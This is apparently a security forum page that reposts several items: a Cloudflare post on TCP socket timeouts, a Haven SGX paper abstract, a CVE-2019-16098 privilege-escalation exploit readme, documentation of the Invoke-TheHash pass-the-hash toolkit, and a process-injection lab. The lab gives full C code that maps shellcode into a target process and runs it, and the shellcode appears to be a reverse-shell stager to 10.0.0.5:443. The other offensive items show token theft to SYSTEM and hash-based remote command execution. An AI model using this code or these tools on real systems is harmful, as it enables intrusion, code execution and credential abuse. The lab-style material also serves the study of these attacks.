The original commit message has slightly more detail: tcp: Add TCP_USER_TIMEOUT socket option To understand the semantics, we need to look at the kernel code in linux/net/ipv4/tcp_timer.c:693: if ((icsk->icsk_user_timeout != 0 && elapsed >= msecs_to_jiffies(icsk->icsk_user_timeout) && icsk->icsk_probes_out > 0) || For the user timeout to have any effect, the icsk_probes_out must not be zero. The check for user timeout is done only after the first probe went out. Let's check it out. Our connection settings: TCP_USER_TIMEOUT = 5*1000 - 5 seconds SO_KEEPALIVE = 1 - enable keepalives TCP_KEEPIDLE = 1 - send first probe quickly - 1 second idle TCP_KEEPINTVL = 11 - subsequent probes every 11 seconds TCP_KEEPCNT = 3 - send three probes before timing out 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # all subsequent packets dropped 00:01.001 IP host.2 > host.1: Flags [.], ack 1 # first probe 00:12.233 IP host.2 > host.1: Flags [R.] # timer for second probe fired, socket aborted due to TCP_USER_TIMEOUT So what happened? The connection sent the first keepalive probe at the 1s mark. Seeing no response the TCP stack then woke up 11 seconds later to send a second probe. This time though, it executed the USER_TIMEOUT code path, which decided to terminate the connection immediately. What if we bump TCP_USER_TIMEOUT to larger values, say between the second and third probe? Then, the connection will be closed on the third probe timer. With TCP_USER_TIMEOUT set to 12.5s: 00:01.022 IP host.2 > host.1: Flags [.] # first probe 00:12.094 IP host.2 > host.1: Flags [.] # second probe 00:23.102 IP host.2 > host.1: Flags [R.] # timer for third probe fired, socket aborted due to TCP_USER_TIMEOUT We’ve shown how TCP_USER_TIMEOUT interacts with keepalives for small and medium values. The last case is when TCP_USER_TIMEOUT is extraordinarily large. Say we set it to 30s: 00:01.027 IP host.2 > host.1: Flags [.], ack 1 # first probe 00:12.195 IP host.2 > host.1: Flags [.], ack 1 # second probe 00:23.207 IP host.2 > host.1: Flags [.], ack 1 # third probe 00:34.211 IP host.2 > host.1: Flags [.], ack 1 # fourth probe! But TCP_KEEPCNT was only 3! 00:45.219 IP host.2 > host.1: Flags [.], ack 1 # fifth probe! 00:56.227 IP host.2 > host.1: Flags [.], ack 1 # sixth probe! 01:07.235 IP host.2 > host.1: Flags [R.], seq 1 # TCP_USER_TIMEOUT aborts conn on 7th probe timer We saw six keepalive probes on the wire! With TCP_USER_TIMEOUT set, the TCP_KEEPCNT is totally ignored. If you want TCP_KEEPCNT to make sense, the only sensible USER_TIMEOUT value is slightly smaller than: TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT Busy ESTAB socket is not forever Thus far we have discussed the case where the connection is idle. Different rules apply when the connection has unacknowledged data in a send buffer. Let's prepare another experiment - after the three-way handshake, let's set up a firewall to drop all packets. Then, let's do a send on one end to have some dropped packets in-flight. An experiment shows the sending socket dies after ~16 minutes: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # All subsequent packets dropped 00:00.206 IP host.2 > host.1: Flags [P.], length 11 # first data packet 00:00.412 IP host.2 > host.1: Flags [P.], length 11 # early retransmit, doesn't count 00:00.620 IP host.2 > host.1: Flags [P.], length 11 # 1st retry 00:01.048 IP host.2 > host.1: Flags [P.], length 11 # 2nd retry 00:01.880 IP host.2 > host.1: Flags [P.], length 11 # 3rd retry State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:1 host:2 ESTAB 0 11 host:2 host:1 timer:(on,1.304ms,3) 00:03.543 IP host.2 > host.1: Flags [P.], length 11 # 4th 00:07.000 IP host.2 > host.1: Flags [P.], length 11 # 5th 00:13.656 IP host.2 > host.1: Flags [P.], length 11 # 6th 00:26.968 IP host.2 > host.1: Flags [P.], length 11 # 7th 00:54.616 IP host.2 > host.1: Flags [P.], length 11 # 8th 01:47.868 IP host.2 > host.1: Flags [P.], length 11 # 9th 03:34.360 IP host.2 > host.1: Flags [P.], length 11 # 10th 05:35.192 IP host.2 > host.1: Flags [P.], length 11 # 11th 07:36.024 IP host.2 > host.1: Flags [P.], length 11 # 12th 09:36.855 IP host.2 > host.1: Flags [P.], length 11 # 13th 11:37.692 IP host.2 > host.1: Flags [P.], length 11 # 14th 13:38.524 IP host.2 > host.1: Flags [P.], length 11 # 15th 15:39.500 connection ETIMEDOUT The data packet is retransmitted 15 times, as controlled by: $ sysctl net.ipv4.tcp_retries2 net.ipv4.tcp_retries2 = 15 From the ip-sysctl.txt documentation: The default value of 15 yields a hypothetical timeout of 924.6 seconds and is a lower bound for the effective timeout. TCP will effectively time out at the first RTO which exceeds the hypothetical timeout. The connection indeed died at ~940 seconds. Notice the socket has the "on" timer running. It doesn't matter at all if we set SO_KEEPALIVE - when the "on" timer is running, keepalives are not engaged. TCP_USER_TIMEOUT keeps on working though. The connection will be aborted exactly after user-timeout specified time since the last received packet. With the user timeout set the tcp_retries2 value is ignored. Zero window ESTAB is... forever? There is one final case worth mentioning. If the sender has plenty of data, and the receiver is slow, then TCP flow control kicks in. At some point the receiver will ask the sender to stop transmitting new data. This is a slightly different condition than the one described above. In this case, with flow control engaged, there is no in-flight or unacknowledged data. Instead the receiver throttles the sender with a "zero window" notification. Then the sender periodically checks if the condition is still valid with "window probes". In this experiment we reduced the receive buffer size for simplicity. Here's how it looks on the wire: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.], win 1152 00:00.000 IP host.2 > host.1: Flags [.] 00:00.202 IP host.2 > host.1: Flags [.], length 576 # first data packet 00:00.202 IP host.1 > host.2: Flags [.], ack 577, win 576 00:00.202 IP host.2 > host.1: Flags [P.], length 576 # second data packet 00:00.244 IP host.1 > host.2: Flags [.], ack 1153, win 0 # throttle it! zero-window 00:00.456 IP host.2 > host.1: Flags [.], ack 1 # zero-window probe 00:00.456 IP host.1 > host.2: Flags [.], ack 1153, win 0 # nope, still zero-window State Recv-Q Send-Q Local:Port Peer:Port ESTAB 1152 0 host:1 host:2 ESTAB 0 129920 host:2 host:1 timer:(persist,048ms,0) The packet capture shows a couple of things. First, we can see two packets with data, each 576 bytes long. They both were immediately acknowledged. The second ACK had "win 0" notification: the sender was told to stop sending data. But the sender is eager to send more! The last two packets show a first "window probe": the sender will periodically send payload-less "ack" packets to check if the window size had changed. As long as the receiver keeps on answering, the sender will keep on sending such probes forever. The socket information shows three important things: The read buffer of the reader is filled - thus the "zero window" throttling is expected. The write buffer of the sender is filled - we have more data to send. The sender has a "persist" timer running, counting the time until the next "window probe". In this blog post we are interested in timeouts - what will happen if the window probes are lost? Will the sender notice? By default the window probe is retried 15 times - adhering to the usual tcp_retries2 setting. The tcp timer is in persist state, so the TCP keepalives will not be running. The SO_KEEPALIVE settings don't make any difference when window probing is engaged. As expected, the TCP_USER_TIMEOUT toggle keeps on working. A slight difference is that similarly to user-timeout on keepalives, it's engaged only when the retransmission timer fires. During such an event, if more than user-timeout seconds since the last good packet passed, the connection will be aborted. Note about using application timeouts In the past we have shared an interesting war story: The curious case of slow downloads Our HTTP server gave up on the connection after an application-managed timeout fired. This was a bug - a slow connection might have correctly slowly drained the send buffer, but the application server didn't notice that. We abruptly dropped slow downloads, even though this wasn't our intention. We just wanted to make sure the client connection was still healthy. It would be better to use TCP_USER_TIMEOUT than rely on application-managed timeouts. But this is not sufficient. We also wanted to guard against a situation where a client stream is valid, but is stuck and doesn't drain the connection. The only way to achieve this is to periodically check the amount of unsent data in the send buffer, and see if it shrinks at a desired pace. For typical applications sending data to the Internet, I would recommend: Enable TCP keepalives. This is needed to keep some data flowing in the idle-connection case. Set TCP_USER_TIMEOUT to TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Be careful when using application-managed timeouts. To detect TCP failures use TCP keepalives and user-timeout. If you want to spare resources and make sure sockets don't stay alive for too long, consider periodically checking if the socket is draining at the desired pace. You can use ioctl(TIOCOUTQ) for that, but it counts both data buffered (notsent) on the socket and in-flight (unacknowledged) bytes. A better way is to use TCP_INFO tcpi_notsent_bytes parameter, which reports only the former counter. An example of checking the draining pace: while True: notsent1 = get_tcp_info(c).tcpi_notsent_bytes notsent1_ts = time.time() ... poll.poll(POLL_PERIOD) ... notsent2 = get_tcp_info(c).tcpi_notsent_bytes notsent2_ts = time.time() pace_in_bytes_per_second = (notsent1 - notsent2) / (notsent2_ts - notsent1_ts) if pace_in_bytes_per_second > 12000: # pace is above effective rate of 96Kbps, ok! else: # socket is too slow... There are ways to further improve this logic. We could use TCP_NOTSENT_LOWAT, although it's generally only useful for situations where the send buffer is relatively empty. Then we could use the SO_TIMESTAMPING interface for notifications about when data gets delivered. Finally, if we are done sending the data to the socket, it's possible to just call close() and defer handling of the socket to the operating system. Such a socket will be stuck in FIN-WAIT-1 or LAST-ACK state until it correctly drains. Summary In this post we discussed five cases where the TCP connection may notice the other party going away: SYN-SENT: The duration of this state can be controlled by TCP_SYNCNT or tcp_syn_retries. SYN-RECV: It's usually hidden from application. It is tuned by tcp_synack_retries. Idling ESTABLISHED connection, will never notice any issues. A solution is to use TCP keepalives. Busy ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Zero-window ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Especially the last two ESTABLISHED cases can be customized with TCP_USER_TIMEOUT, but this setting also affects other situations. Generally speaking, it can be thought of as a hint to the kernel to abort the connection after so-many seconds since the last good packet. This is a dangerous setting though, and if used in conjunction with TCP keepalives should be set to a value slightly lower than TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Otherwise it will affect, and potentially cancel out, the TCP_KEEPCNT value. In this post we presented scripts showing the effects of timeout-related socket options under various network conditions. Interleaving the tcpdump packet capture with the output of ss -o is a great way of understanding the networking stack. We were able to create reproducible test cases showing the "on", "keepalive" and "persist" timers in action. This is a very useful framework for further experimentation. Finally, it's surprisingly hard to tune a TCP connection to be confident that the remote host is actually up. During our debugging we found that looking at the send buffer size and currently active TCP timer can be very helpful in understanding whether the socket is actually healthy. The bug in our Spectrum application turned out to be a wrong TCP_USER_TIMEOUT setting - without it sockets with large send buffers were lingering around for way longer than we intended. The scripts used in this article can be found on our Github. Figuring this out has been a collaboration across three Cloudflare offices. Thanks to Hiren Panchasara from San Jose, Warren Nelson from Austin and Jakub Sitnicki from Warsaw. Fancy joining the team? Apply here! Sursa: https://blog.cloudflare.com/when-tcp-sockets-refuse-to-die/
-
- 1
-
-
hielding applications from an untrusted cloud with Haven Andrew Baumann Marcus Peinado Galen Hunt 11th USENIX Symposium on Operating Systems Design and Implementation (OSDI '14) | October 2014 Published by USENIX - Advanced Computing Systems Association Best Paper Award View Publication Download BibTex Today’s cloud computing infrastructure requires substantial trust. Cloud users rely on both the provider’s staff and its globally-distributed software/hardware platform not to expose any of their private data. We introduce the notion of shielded execution, which protects the confidentiality and integrity of a program and its data from the platform on which it runs (i.e., the cloud operator’s OS, VM and firmware). Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification. Download PDF Sursa: https://www.microsoft.com/en-us/research/publication/shielding-applications-from-an-untrusted-cloud-with-haven/
-
CVE-2019-16098 The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. For more updates, visit CVE-2019-16098 WARNING: Hardcoded Windows 10 x64 Version 1903 offsets! Microsoft Windows [Version 10.0.18362.295] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\Barakat\source\repos\CVE-2019-16098>whoami Barakat C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe [*] Device object handle has been obtained [*] Ntoskrnl base address: FFFFF80734200000 [*] PsInitialSystemProcess address: FFFFC288A607F300 [*] System process token: FFFF9703A9E061B0 [*] Current process address: FFFFC288B7959400 [*] Current process token: FFFF9703B9D785F0 [*] Stealing System process token ... [*] Spawning new shell ... Microsoft Windows [Version 10.0.18362.295] (c) 2019 Microsoft Corporation. All rights reserved. C:\Users\Barakat\source\repos\CVE-2019-16098>whoami SYSTEM C:\Users\Barakat\source\repos\CVE-2019-16098> Sursa: https://github.com/Barakat/CVE-2019-16098
-
Invoke-TheHash Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side. Requirements Minimum PowerShell 2.0 Import Import-Module ./Invoke-TheHash.psd1 or . ./Invoke-WMIExec.ps1 . ./Invoke-SMBExec.ps1 . ./Invoke-SMBEnum.ps1 . ./Invoke-SMBClient.ps1 . ./Invoke-TheHash.ps1 Functions Invoke-WMIExec Invoke-SMBExec Invoke-SMBEnum Invoke-SMBClient Invoke-TheHash Invoke-WMIExec WMI command execution function. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. Sleep - Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Screenshot: Invoke-SMBExec SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to SCM on the target. CommandCOMSPEC - Default = Enabled: Prepend %COMSPEC% /C to Command. Service - Default = 20 Character Random: Name of the service to create and delete on the target. Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Example: Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Example: Check SMB signing requirements on target. Invoke-SMBExec -Target 192.168.100.20 Screenshot: Invoke-SMBEnum Invoke-SMBEnum performs User, Group, NetSession and Share enumeration tasks over SMB2.1 with and without SMB signing. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Action - (All,Group,NetSession,Share,User) Default = Share: Enumeration action to perform. Group - Default = Administrators: Group to enumerate. Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1. Example: Invoke-SMBEnum -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -verbose Screenshot: Invoke-SMBClient SMB client function supporting SMB2.1 and SMB signing. This function primarily provides SMB file share capabilities for working with hashes that do not have remote command execution privilege. This function can also be used for staging payloads for use with Invoke-WMIExec and Invoke-SMBExec. Note that Invoke-SMBClient is built on the .NET TCPClient and does not use the Windows SMB client. Invoke-SMBClient is much slower than the Windows client. Parameters: Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. Action - Default = List: (List/Recurse/Delete/Get/Put) Action to perform. List: Lists the contents of a directory. Recurse: Lists the contents of a directory and all subdirectories. Delete: Deletes a file. Get: Downloads a file. Put: Uploads a file and sets the creation, access, and last write times to match the source file. Source List and Recurse: UNC path to a directory. Delete: UNC path to a file. Get: UNC path to a file. Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the 'Modify' switch, 'Source' must be a byte array. Destination List and Recurse: Not used. Delete: Not used. Get: If used, value will be the new filename of downloaded file. If a full path is not specified, the file will be created in the current directory. Put: UNC path for uploaded file. The filename must be specified. Modify List and Recurse: The function will output an object consisting of directory contents. Delete: Not used. Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's advisable to use this only with smaller files and to send the output to a variable. Put: Uploads a byte array to a new destination file. NoProgress - Prevents displaying an upload and download progress bar. Sleep - Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Version - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1. Example: List the contents of a root share directory. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose Example: Recursively list the contents of a share starting at the root. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share Example: Recursively list the contents of a share subdirectory and return only the contents output to a variable. $directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify Example: Delete a file on a share. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\file.txt Example: Delete a file in subdirectories within a share. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\file.txt Example: Download a file from a share. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt Example: Download a file from within a share subdirectory and set a new filename. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\file.txt -Destination file.txt Example: Download a file from a share to a byte array variable instead of disk. $password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\file.txt -Modify Example: Upload a file to a share subdirectory. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\server\share\subdirectory\file.exe Example: Upload a file to share from a byte array variable. Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.txt -Modify Screenshot: Invoke-TheHash Function for running Invoke-TheHash functions against multiple targets. Parameters: Type - Sets the desired Invoke-TheHash function. Set to either SMBClient, SMBEnum, SMBExec, or WMIExec. Target - List of hostnames, IP addresses, CIDR notation, or IP ranges for targets. TargetExclude - List of hostnames, IP addresses, CIDR notation, or IP ranges to exclude from the list or targets. PortCheckDisable - (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up he function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection. PortCheckTimeout - Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI or SCM on the target. CommandCOMSPEC - Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. Service - Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. SMB1 - (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. Sleep - Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 Screenshot: Sursa: https://github.com/Kevin-Robertson/Invoke-TheHash/
-
NtCreateSection + NtMapViewOfSection Code Injection Overview This lab is for a code injection technique that leverages Native APIs NtCreateSection, NtMapViewOfSection and RtlCreateUserThread. Section is a memory block that is shared between processes and can be created with NtCreateSection API Before a process can read/write to that block of memory, it has to map a view of the said section, which can be done with NtMapViewOfSection Multiple processes can read from and write to the section through the mapped views High level overwiew of the technique: Create a new memory section with RWX protection Map a view of the previously created section to the local malicious process with RW protection Map a view of the previously created section to a remote target process with RX protection. Note that by mapping the views with RW (locally) and RX (in the target process) we do not need to allocate memory pages with RWX, which may be frowned upon by some EDRs. Fill the view mapped in the local process with shellcode. By definition, the mapped view in the target process will get filled with the same shellcode Create a remote thread in the target process and point it to the mapped view in the target process to trigger the shellcode Execution Let's create a new memory section in the local process, that will have RWX access rights set: fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); We can see the section got created and we obtained its handle 0x88: Let's create an RW view of the section in our local process and obtain its address which will get stored in localSectionAddress: fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE); Let's create another view of the same section in a target process (notepad.exe PID 6572 in our case), but this time with RX protection. The memory address of the view will get stored in remoteSectionAddress variable: We can now copy the shellcode into our localSectionAddress, which will get automatically mirrored/reflected in the remoteSectionAddress as it's a view of the same section shared between our local and target processes: memcpy(localSectionAddress, buf, sizeof(buf)); Below shows how the localSectionAddress gets filled with the shellcode and at the same time the remoteSectionAddress at 0x000002614ed50000 inside notepad (on the right) gets filled with the same shellcode: We can now create a remote thread inside the notepad.exe and make the remoteSectionAddress its start address in order to trigger the shellcode: fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL); Code #include <iostream> #include <Windows.h> #pragma comment(lib, "ntdll") typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL); using myNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect); using myRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID); int main() { unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\x0a\x00\x00\x05\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"; myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection")); myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection")); myRtlCreateUserThread fRtlCreateUserThread = (myRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread")); SIZE_T size = 4096; LARGE_INTEGER sectionSize = { size }; HANDLE sectionHandle = NULL; PVOID localSectionAddress = NULL, remoteSectionAddress = NULL; // create a memory section fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); // create a view of the memory section in the local process fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE); // create a view of the memory section in the target process HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, 1480); fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ); // copy shellcode to the local view, which will get reflected in the target process's mapped view memcpy(localSectionAddress, buf, sizeof(buf)); HANDLE targetThreadHandle = NULL; fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL); return 0; } References NTAPI Undocumented Functions undocumented.ntinternals.net NTAPI Undocumented Functions undocumented.ntinternals.net Section Objects and Views - Windows drivers Section Objects and Views docs.microsoft.com Sursa: https://ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection
-
